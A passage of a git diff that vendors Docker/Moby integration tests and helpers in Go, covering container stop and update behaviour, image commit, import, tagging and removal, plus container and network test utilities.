""), io.EOF) +} diff --git a/vendor/github.com/docker/docker/integration/container/stop_test.go b/vendor/github.com/docker/docker/integration/container/stop_test.go new file mode 100644 index 0000000000..7a2fa20188 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/stop_test.go @@ -0,0 +1,127 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "fmt" + "strconv" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + "gotest.tools/icmd" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestStopContainerWithRestartPolicyAlways(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + names := []string{"verifyRestart1-" + t.Name(), "verifyRestart2-" + t.Name()} + for _, name := range names { + container.Run(t, ctx, client, container.WithName(name), container.WithCmd("false"), func(c *container.TestContainerConfig) { + c.HostConfig.RestartPolicy.Name = "always" + }) + } + + for _, name := range names { + poll.WaitOn(t, container.IsInState(ctx, client, name, "running", "restarting"), poll.WithDelay(100*time.Millisecond)) + } + + for _, name := range names { + err := client.ContainerStop(ctx, name, nil) + assert.NilError(t, err) + } + + for _, name := range names { + poll.WaitOn(t, container.IsStopped(ctx, client, name), poll.WithDelay(100*time.Millisecond)) + } +} + +// TestStopContainerWithTimeout checks that ContainerStop with +// a timeout works as documented, i.e. in case of negative timeout +// waiting is not limited (issue #35311). 
+func TestStopContainerWithTimeout(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + testCmd := container.WithCmd("sh", "-c", "sleep 2 && exit 42") + testData := []struct { + doc string + timeout int + expectedExitCode int + }{ + // In case container is forcefully killed, 137 is returned, + // otherwise the exit code from the above script + { + "zero timeout: expect forceful container kill", + 0, 137, + }, + { + "too small timeout: expect forceful container kill", + 1, 137, + }, + { + "big enough timeout: expect graceful container stop", + 3, 42, + }, + { + "unlimited timeout: expect graceful container stop", + -1, 42, + }, + } + + for _, d := range testData { + d := d + t.Run(strconv.Itoa(d.timeout), func(t *testing.T) { + t.Parallel() + id := container.Run(t, ctx, client, testCmd) + + timeout := time.Duration(d.timeout) * time.Second + err := client.ContainerStop(ctx, id, &timeout) + assert.NilError(t, err) + + poll.WaitOn(t, container.IsStopped(ctx, client, id), + poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + assert.Equal(t, inspect.State.ExitCode, d.expectedExitCode) + }) + } +} + +func TestDeleteDevicemapper(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.Driver != "devicemapper") + skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run") + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + id := container.Run(t, ctx, client, container.WithName("foo-"+t.Name()), container.WithCmd("echo")) + + poll.WaitOn(t, container.IsStopped(ctx, client, id), poll.WithDelay(100*time.Millisecond)) + + inspect, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + + deviceID := inspect.GraphDriver.Data["DeviceId"] + + // Find pool name from device name + deviceName := inspect.GraphDriver.Data["DeviceName"] + devicePrefix := deviceName[:strings.LastIndex(deviceName, "-")] + 
devicePool := fmt.Sprintf("/dev/mapper/%s-pool", devicePrefix) + + result := icmd.RunCommand("dmsetup", "message", devicePool, "0", fmt.Sprintf("delete %s", deviceID)) + result.Assert(t, icmd.Success) + + err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{}) + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/integration/container/update_linux_test.go b/vendor/github.com/docker/docker/integration/container/update_linux_test.go new file mode 100644 index 0000000000..0e410a1461 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/update_linux_test.go @@ -0,0 +1,107 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "strconv" + "strings" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" + "gotest.tools/skip" +) + +func TestUpdateMemory(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, !testEnv.DaemonInfo.MemoryLimit) + skip.If(t, !testEnv.DaemonInfo.SwapLimit) + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.Resources = containertypes.Resources{ + Memory: 200 * 1024 * 1024, + } + }) + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "running"), poll.WithDelay(100*time.Millisecond)) + + const ( + setMemory int64 = 314572800 + setMemorySwap int64 = 524288000 + ) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + Resources: containertypes.Resources{ + Memory: setMemory, + MemorySwap: setMemorySwap, + }, + }) + assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, 
is.Equal(setMemory, inspect.HostConfig.Memory)) + assert.Check(t, is.Equal(setMemorySwap, inspect.HostConfig.MemorySwap)) + + res, err := container.Exec(ctx, client, cID, + []string{"cat", "/sys/fs/cgroup/memory/memory.limit_in_bytes"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + assert.Check(t, is.Equal(strconv.FormatInt(setMemory, 10), strings.TrimSpace(res.Stdout()))) + + res, err = container.Exec(ctx, client, cID, + []string{"cat", "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + assert.Check(t, is.Equal(strconv.FormatInt(setMemorySwap, 10), strings.TrimSpace(res.Stdout()))) +} + +func TestUpdateCPUQuota(t *testing.T) { + t.Parallel() + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + for _, test := range []struct { + desc string + update int64 + }{ + {desc: "some random value", update: 15000}, + {desc: "a higher value", update: 20000}, + {desc: "a lower value", update: 10000}, + {desc: "unset value", update: -1}, + } { + if _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + Resources: containertypes.Resources{ + CPUQuota: test.update, + }, + }); err != nil { + t.Fatal(err) + } + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(test.update, inspect.HostConfig.CPUQuota)) + + res, err := container.Exec(ctx, client, cID, + []string{"/bin/cat", "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + + assert.Check(t, is.Equal(strconv.FormatInt(test.update, 10), strings.TrimSpace(res.Stdout()))) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/update_test.go 
b/vendor/github.com/docker/docker/integration/container/update_test.go new file mode 100644 index 0000000000..0e32184d27 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/update_test.go @@ -0,0 +1,64 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" +) + +func TestUpdateRestartPolicy(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "sleep 1 && false"), func(c *container.TestContainerConfig) { + c.HostConfig.RestartPolicy = containertypes.RestartPolicy{ + Name: "on-failure", + MaximumRetryCount: 3, + } + }) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + RestartPolicy: containertypes.RestartPolicy{ + Name: "on-failure", + MaximumRetryCount: 5, + }, + }) + assert.NilError(t, err) + + timeout := 60 * time.Second + if testEnv.OSType == "windows" { + timeout = 180 * time.Second + } + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(timeout)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(inspect.RestartCount, 5)) + assert.Check(t, is.Equal(inspect.HostConfig.RestartPolicy.MaximumRetryCount, 5)) +} + +func TestUpdateRestartWithAutoRemove(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.AutoRemove = true + }) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + 
RestartPolicy: containertypes.RestartPolicy{ + Name: "always", + }, + }) + assert.Check(t, is.ErrorContains(err, "Restart policy cannot be updated because AutoRemove is enabled for the container")) +} diff --git a/vendor/github.com/docker/docker/integration/doc.go b/vendor/github.com/docker/docker/integration/doc.go new file mode 100644 index 0000000000..ee4bf50430 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/doc.go @@ -0,0 +1,3 @@ +// Package integration provides integrations tests for Moby (API). +// These tests require a daemon (dockerd for now) to run. +package integration // import "github.com/docker/docker/integration" diff --git a/vendor/github.com/docker/docker/integration/image/commit_test.go b/vendor/github.com/docker/docker/integration/image/commit_test.go new file mode 100644 index 0000000000..4555391262 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/commit_test.go @@ -0,0 +1,48 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestCommitInheritsEnv(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID1 := container.Create(t, ctx, client) + + commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{ + Changes: []string{"ENV PATH=/bin"}, + Reference: "test-commit-image", + }) + assert.NilError(t, err) + + image1, _, err := client.ImageInspectWithRaw(ctx, commitResp1.ID) + assert.NilError(t, err) + + expectedEnv1 := []string{"PATH=/bin"} + assert.Check(t, is.DeepEqual(expectedEnv1, 
image1.Config.Env)) + + cID2 := container.Create(t, ctx, client, container.WithImage(image1.ID)) + + commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{ + Changes: []string{"ENV PATH=/usr/bin:$PATH"}, + Reference: "test-commit-image", + }) + assert.NilError(t, err) + + image2, _, err := client.ImageInspectWithRaw(ctx, commitResp2.ID) + assert.NilError(t, err) + expectedEnv2 := []string{"PATH=/usr/bin:/bin"} + assert.Check(t, is.DeepEqual(expectedEnv2, image2.Config.Env)) +} diff --git a/vendor/github.com/docker/docker/integration/image/import_test.go b/vendor/github.com/docker/docker/integration/image/import_test.go new file mode 100644 index 0000000000..89dddf2cc8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/import_test.go @@ -0,0 +1,42 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "archive/tar" + "bytes" + "context" + "io" + "runtime" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" +) + +// Ensure we don't regress on CVE-2017-14992. +func TestImportExtremelyLargeImageWorks(t *testing.T) { + if runtime.GOARCH == "arm64" { + t.Skip("effective test will be time out") + } + + client := request.NewAPIClient(t) + + // Construct an empty tar archive with about 8GB of junk padding at the + // end. This should not cause any crashes (the padding should be mostly + // ignored). 
+ var tarBuffer bytes.Buffer + + tw := tar.NewWriter(&tarBuffer) + if err := tw.Close(); err != nil { + t.Fatal(err) + } + imageRdr := io.MultiReader(&tarBuffer, io.LimitReader(testutil.DevZero, 8*1024*1024*1024)) + + _, err := client.ImageImport(context.Background(), + types.ImageImportSource{Source: imageRdr, SourceName: "-"}, + "test1234:v42", + types.ImageImportOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/integration/image/main_test.go b/vendor/github.com/docker/docker/integration/image/main_test.go new file mode 100644 index 0000000000..1b4270dfc6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/main_test.go @@ -0,0 +1,33 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/image/remove_test.go b/vendor/github.com/docker/docker/integration/image/remove_test.go new file mode 100644 index 0000000000..4f9122a5e3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/remove_test.go @@ -0,0 +1,59 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestRemoveImageOrphaning(t *testing.T) { + defer 
setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + img := "test-container-orphaning" + + // Create a container from busybox, and commit a small change so we have a new image + cID1 := container.Create(t, ctx, client, container.WithCmd("")) + commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{ + Changes: []string{`ENTRYPOINT ["true"]`}, + Reference: img, + }) + assert.NilError(t, err) + + // verifies that reference now points to first image + resp, _, err := client.ImageInspectWithRaw(ctx, img) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp1.ID)) + + // Create a container from created image, and commit a small change with same reference name + cID2 := container.Create(t, ctx, client, container.WithImage(img), container.WithCmd("")) + commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{ + Changes: []string{`LABEL Maintainer="Integration Tests"`}, + Reference: img, + }) + assert.NilError(t, err) + + // verifies that reference now points to second image + resp, _, err = client.ImageInspectWithRaw(ctx, img) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp2.ID)) + + // try to remove the image, should not error out. 
+ _, err = client.ImageRemove(ctx, img, types.ImageRemoveOptions{}) + assert.NilError(t, err) + + // check if the first image is still there + resp, _, err = client.ImageInspectWithRaw(ctx, commitResp1.ID) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp1.ID)) + + // check if the second image has been deleted + _, _, err = client.ImageInspectWithRaw(ctx, commitResp2.ID) + assert.Check(t, is.ErrorContains(err, "No such image:")) +} diff --git a/vendor/github.com/docker/docker/integration/image/tag_test.go b/vendor/github.com/docker/docker/integration/image/tag_test.go new file mode 100644 index 0000000000..55c3ff7b2b --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/tag_test.go @@ -0,0 +1,140 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// tagging a named image in a new unprefixed repo should work +func TestTagUnprefixedRepoByNameOrName(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + // By name + err := client.ImageTag(ctx, "busybox:latest", "testfoobarbaz") + assert.NilError(t, err) + + // By ID + insp, _, err := client.ImageInspectWithRaw(ctx, "busybox") + assert.NilError(t, err) + err = client.ImageTag(ctx, insp.ID, "testfoobarbaz") + assert.NilError(t, err) +} + +// ensure we don't allow the use of invalid repository names or tags; these tag operations should fail +// TODO (yongtang): Migrate to unit tests +func TestTagInvalidReference(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} + + for _, repo := range invalidRepos { + err := client.ImageTag(ctx, "busybox", 
repo) + assert.Check(t, is.ErrorContains(err, "not a valid repository/tag")) + } + + longTag := testutil.GenerateRandomAlphaOnlyString(121) + + invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} + + for _, repotag := range invalidTags { + err := client.ImageTag(ctx, "busybox", repotag) + assert.Check(t, is.ErrorContains(err, "not a valid repository/tag")) + } + + // test repository name begin with '-' + err := client.ImageTag(ctx, "busybox:latest", "-busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test namespace name begin with '-' + err = client.ImageTag(ctx, "busybox:latest", "-test/busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test index name begin with '-' + err = client.ImageTag(ctx, "busybox:latest", "-index:5000/busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test setting tag fails + err = client.ImageTag(ctx, "busybox:latest", "sha256:sometag") + assert.Check(t, is.ErrorContains(err, "refusing to create an ambiguous tag using digest algorithm as name")) +} + +// ensure we allow the use of valid tags +func TestTagValidPrefixedRepo(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} + + for _, repo := range validRepos { + err := client.ImageTag(ctx, "busybox", repo) + assert.NilError(t, err) + } +} + +// tag an image with an existed tag name without -f option should work +func TestTagExistedNameWithoutForce(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + err := client.ImageTag(ctx, "busybox:latest", "busybox:test") + assert.NilError(t, err) +} + +// ensure tagging using official names 
works +// ensure all tags result in the same name +func TestTagOfficialNames(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + names := []string{ + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + + for _, name := range names { + err := client.ImageTag(ctx, "busybox", name+":latest") + assert.NilError(t, err) + + // ensure we don't have multiple tag names. + insp, _, err := client.ImageInspectWithRaw(ctx, "busybox") + assert.NilError(t, err) + assert.Assert(t, !is.Contains(insp.RepoTags, name)().Success()) + } + + for _, name := range names { + err := client.ImageTag(ctx, name+":latest", "fooo/bar:latest") + assert.NilError(t, err) + } +} + +// ensure tags can not match digests +func TestTagMatchesDigest(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" + // test setting tag fails + err := client.ImageTag(ctx, "busybox:latest", digest) + assert.Check(t, is.ErrorContains(err, "refusing to create a tag with a digest reference")) + + // check that no new image matches the digest + _, _, err = client.ImageInspectWithRaw(ctx, digest) + assert.Check(t, is.ErrorContains(err, fmt.Sprintf("No such image: %s", digest))) +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/container.go b/vendor/github.com/docker/docker/integration/internal/container/container.go new file mode 100644 index 0000000000..489e07154a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/container.go @@ -0,0 +1,54 @@ +package container + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + 
"gotest.tools/assert" +) + +// TestContainerConfig holds container configuration struct that +// are used in api calls. +type TestContainerConfig struct { + Name string + Config *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig +} + +// Create creates a container with the specified options +func Create(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint + t.Helper() + config := &TestContainerConfig{ + Config: &container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + }, + HostConfig: &container.HostConfig{}, + NetworkingConfig: &network.NetworkingConfig{}, + } + + for _, op := range ops { + op(config) + } + + c, err := client.ContainerCreate(ctx, config.Config, config.HostConfig, config.NetworkingConfig, config.Name) + assert.NilError(t, err) + + return c.ID +} + +// Run creates and start a container with the specified options +func Run(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint + t.Helper() + id := Create(t, ctx, client, ops...) 
+ + err := client.ContainerStart(ctx, id, types.ContainerStartOptions{}) + assert.NilError(t, err) + + return id +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/exec.go b/vendor/github.com/docker/docker/integration/internal/container/exec.go new file mode 100644 index 0000000000..55ad23aeb5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/exec.go @@ -0,0 +1,86 @@ +package container + +import ( + "bytes" + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" +) + +// ExecResult represents a result returned from Exec() +type ExecResult struct { + ExitCode int + outBuffer *bytes.Buffer + errBuffer *bytes.Buffer +} + +// Stdout returns stdout output of a command run by Exec() +func (res *ExecResult) Stdout() string { + return res.outBuffer.String() +} + +// Stderr returns stderr output of a command run by Exec() +func (res *ExecResult) Stderr() string { + return res.errBuffer.String() +} + +// Combined returns combined stdout and stderr output of a command run by Exec() +func (res *ExecResult) Combined() string { + return res.outBuffer.String() + res.errBuffer.String() +} + +// Exec executes a command inside a container, returning the result +// containing stdout, stderr, and exit code. Note: +// - this is a synchronous operation; +// - cmd stdin is closed. 
+func Exec(ctx context.Context, cli client.APIClient, id string, cmd []string) (ExecResult, error) { + // prepare exec + execConfig := types.ExecConfig{ + AttachStdout: true, + AttachStderr: true, + Cmd: cmd, + } + cresp, err := cli.ContainerExecCreate(ctx, id, execConfig) + if err != nil { + return ExecResult{}, err + } + execID := cresp.ID + + // run it, with stdout/stderr attached + aresp, err := cli.ContainerExecAttach(ctx, execID, types.ExecStartCheck{}) + if err != nil { + return ExecResult{}, err + } + defer aresp.Close() + + // read the output + var outBuf, errBuf bytes.Buffer + outputDone := make(chan error) + + go func() { + // StdCopy demultiplexes the stream into two buffers + _, err = stdcopy.StdCopy(&outBuf, &errBuf, aresp.Reader) + outputDone <- err + }() + + select { + case err := <-outputDone: + if err != nil { + return ExecResult{}, err + } + break + + case <-ctx.Done(): + return ExecResult{}, ctx.Err() + } + + // get the exit code + iresp, err := cli.ContainerExecInspect(ctx, execID) + if err != nil { + return ExecResult{}, err + } + + return ExecResult{ExitCode: iresp.ExitCode, outBuffer: &outBuf, errBuffer: &errBuf}, nil +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/ops.go b/vendor/github.com/docker/docker/integration/internal/container/ops.go new file mode 100644 index 0000000000..df5598b62f --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/ops.go @@ -0,0 +1,136 @@ +package container + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// WithName sets the name of the container +func WithName(name string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Name = name + } +} + +// WithLinks sets the links of the container +func WithLinks(links ...string) 
func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.Links = links + } +} + +// WithImage sets the image of the container +func WithImage(image string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Image = image + } +} + +// WithCmd sets the comannds of the container +func WithCmd(cmds ...string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Cmd = strslice.StrSlice(cmds) + } +} + +// WithNetworkMode sets the network mode of the container +func WithNetworkMode(mode string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.NetworkMode = containertypes.NetworkMode(mode) + } +} + +// WithExposedPorts sets the exposed ports of the container +func WithExposedPorts(ports ...string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.ExposedPorts = map[nat.Port]struct{}{} + for _, port := range ports { + c.Config.ExposedPorts[nat.Port(port)] = struct{}{} + } + } +} + +// WithTty sets the TTY mode of the container +func WithTty(tty bool) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Tty = tty + } +} + +// WithWorkingDir sets the working dir of the container +func WithWorkingDir(dir string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.WorkingDir = dir + } +} + +// WithVolume sets the volume of the container +func WithVolume(name string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.Config.Volumes == nil { + c.Config.Volumes = map[string]struct{}{} + } + c.Config.Volumes[name] = struct{}{} + } +} + +// WithBind sets the bind mount of the container +func WithBind(src, target string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.Binds = append(c.HostConfig.Binds, fmt.Sprintf("%s:%s", src, target)) + } +} + +// WithIPv4 sets the specified ip for the specified network of the container 
+func WithIPv4(network, ip string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.NetworkingConfig.EndpointsConfig == nil { + c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{} + } + if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil { + c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{} + } + if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil { + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{} + } + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv4Address = ip + } +} + +// WithIPv6 sets the specified ip6 for the specified network of the container +func WithIPv6(network, ip string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.NetworkingConfig.EndpointsConfig == nil { + c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{} + } + if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil { + c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{} + } + if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil { + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{} + } + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv6Address = ip + } +} + +// WithLogDriver sets the log driver to use for the container +func WithLogDriver(driver string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.HostConfig == nil { + c.HostConfig = &containertypes.HostConfig{} + } + c.HostConfig.LogConfig.Type = driver + } +} + +// WithAutoRemove sets the container to be removed on exit +func WithAutoRemove(c *TestContainerConfig) { + if c.HostConfig == nil { + c.HostConfig = &containertypes.HostConfig{} + } + c.HostConfig.AutoRemove = true +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/states.go 
b/vendor/github.com/docker/docker/integration/internal/container/states.go new file mode 100644 index 0000000000..088407deb8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/states.go @@ -0,0 +1,41 @@ +package container + +import ( + "context" + "strings" + + "github.com/docker/docker/client" + "gotest.tools/poll" +) + +// IsStopped verifies the container is in stopped state. +func IsStopped(ctx context.Context, client client.APIClient, containerID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + + switch { + case err != nil: + return poll.Error(err) + case !inspect.State.Running: + return poll.Success() + default: + return poll.Continue("waiting for container to be stopped") + } + } +} + +// IsInState verifies the container is in one of the specified state, e.g., "running", "exited", etc. +func IsInState(ctx context.Context, client client.APIClient, containerID string, state ...string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + if err != nil { + return poll.Error(err) + } + for _, v := range state { + if inspect.State.Status == v { + return poll.Success() + } + } + return poll.Continue("waiting for container to be one of (%s), currently %s", strings.Join(state, ", "), inspect.State.Status) + } +} diff --git a/vendor/github.com/docker/docker/integration/internal/network/network.go b/vendor/github.com/docker/docker/integration/internal/network/network.go new file mode 100644 index 0000000000..9c13114f92 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/network/network.go @@ -0,0 +1,35 @@ +package network + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "gotest.tools/assert" +) + +func createNetwork(ctx context.Context, client client.APIClient, name 
string, ops ...func(*types.NetworkCreate)) (string, error) { + config := types.NetworkCreate{} + + for _, op := range ops { + op(&config) + } + + n, err := client.NetworkCreate(ctx, name, config) + return n.ID, err +} + +// Create creates a network with the specified options +func Create(ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) (string, error) { + return createNetwork(ctx, client, name, ops...) +} + +// CreateNoError creates a network with the specified options and verifies there were no errors +func CreateNoError(t *testing.T, ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) string { // nolint: golint + t.Helper() + + name, err := createNetwork(ctx, client, name, ops...) + assert.NilError(t, err) + return name +} diff --git a/vendor/github.com/docker/docker/integration/internal/network/ops.go b/vendor/github.com/docker/docker/integration/internal/network/ops.go new file mode 100644 index 0000000000..190918abed --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/network/ops.go @@ 